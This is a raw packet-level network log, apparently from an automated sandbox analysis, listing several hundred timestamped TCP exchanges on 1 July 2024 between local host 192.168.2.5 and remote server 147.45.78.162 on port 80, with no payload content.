Jul 1, 2024 13:02:07.550299883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.551079035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551089048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551105022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551153898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.551163912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.551821947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551835060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551852942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551863909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.551871061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.551898003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.552611113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.552623987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.552634001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.552659988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.552673101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.553369045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.553381920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.553390980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.553401947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.553416014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.553421974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.553452969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.553472042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.553486109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.554404974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.554418087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.554430962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.554449081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.554459095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.554469109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.554476976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.554505110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.555375099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.555387020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.555397987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.555408955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.555427074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.555468082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.556504965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.556518078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.556529045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.556540966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.556566954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.556586981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.557311058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.557322025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.557332993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.557344913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.557353020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.557363033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.557389021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.557446957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.558548927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.558583021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.558594942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.558607101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.558630943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.558653116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.559272051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.559283018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.559293985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.559300900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.559307098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.559382915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.560163975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.560175896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.560187101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.560198069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.560230017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.560246944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.561058044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.561070919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.561080933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.561094046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.561104059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.561120033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.561156988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.562141895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562154055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562165976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562176943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562223911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.562247038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.562707901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562721014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562731028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562742949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562753916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.562777996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.562799931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.563560009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.563571930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.563584089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.563596964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.563622952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.563642025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.564301014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.564311981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.564322948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.564333916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.564367056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.564377069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.565229893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565242052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565253019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565263987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565275908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565433025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.565965891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565975904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565987110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.565998077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.566009045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.566073895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.566983938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.566996098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.567006111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.567017078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.567028999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.567039967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.567051888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.567078114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.567116976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.568202972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.568214893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.568224907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.568231106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.568240881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.568252087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.568260908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.568283081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.568310022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.569397926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.569408894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.569427967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.569439888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.569451094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.569458961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.569484949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.570420027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570432901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570444107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570456028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570466995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570475101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.570486069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570496082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.570514917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.570907116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570918083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570930004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570941925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570952892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.570961952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.570993900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.571732998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.571744919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.571763039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.571775913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.571785927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.571793079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.571799994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.571810961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.571822882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.571855068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.572654963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.572666883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.572676897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.572689056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.572699070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.572711945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.572741985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.573684931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.573698044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.573708057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.573720932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.573729992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.573746920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.573753119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.573771954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.573795080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.574762106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574774027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574784040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574795961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574806929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574822903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574827909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.574836969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.574846029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.574871063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.574893951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.575767994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.575779915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.575790882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.575802088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.575814009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.575825930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.575831890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.575855017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.575877905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.577167034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577179909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577191114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577204943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577214956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577227116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577234030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.577244997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577287912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.577301979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.577797890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577811003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577873945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577884912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.577893019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577903986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577914953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577925920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577939034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577946901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.577955961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.577977896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.578011036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.578717947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.578730106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.578741074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.578752041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.578763008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.578773975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.578787088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.578830957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.579674006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579685926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579696894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579708099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579719067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579730988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579739094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.579749107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.579757929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.579778910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.579813957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.580578089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580590963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580606937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580620050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580630064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580638885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.580650091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580661058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.580668926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.580693007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.580718040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.581566095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.581578016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.581588984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.581599951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.581610918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.581621885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.581630945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.581666946 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.582298040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582309008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582319975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582355976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.582370043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.582379103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582390070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582400084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582412004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.582418919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.582437038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.582463026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.583291054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583302975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583312988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583324909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583336115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583343983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.583353996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583364964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.583376884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.583410978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.584135056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584146023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584156990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584189892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.584199905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.584536076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584547043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584604979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.584614038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584625006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584635973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584647894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584656000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.584666967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.584690094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.584712982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.585496902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.585509062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.585520029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.585531950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.585544109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.585556030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.585561991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.585596085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.586049080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.586417913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.586430073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.586440086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.586452007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.586463928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.586554050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.587331057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.587343931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.587393999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.587979078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.587990999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588001966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588013887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588025093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588037968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.588071108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.588908911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588920116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588931084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.588943005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.588949919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.589018106 CEST	49705	80	192.168.2.5	147.45.78.162
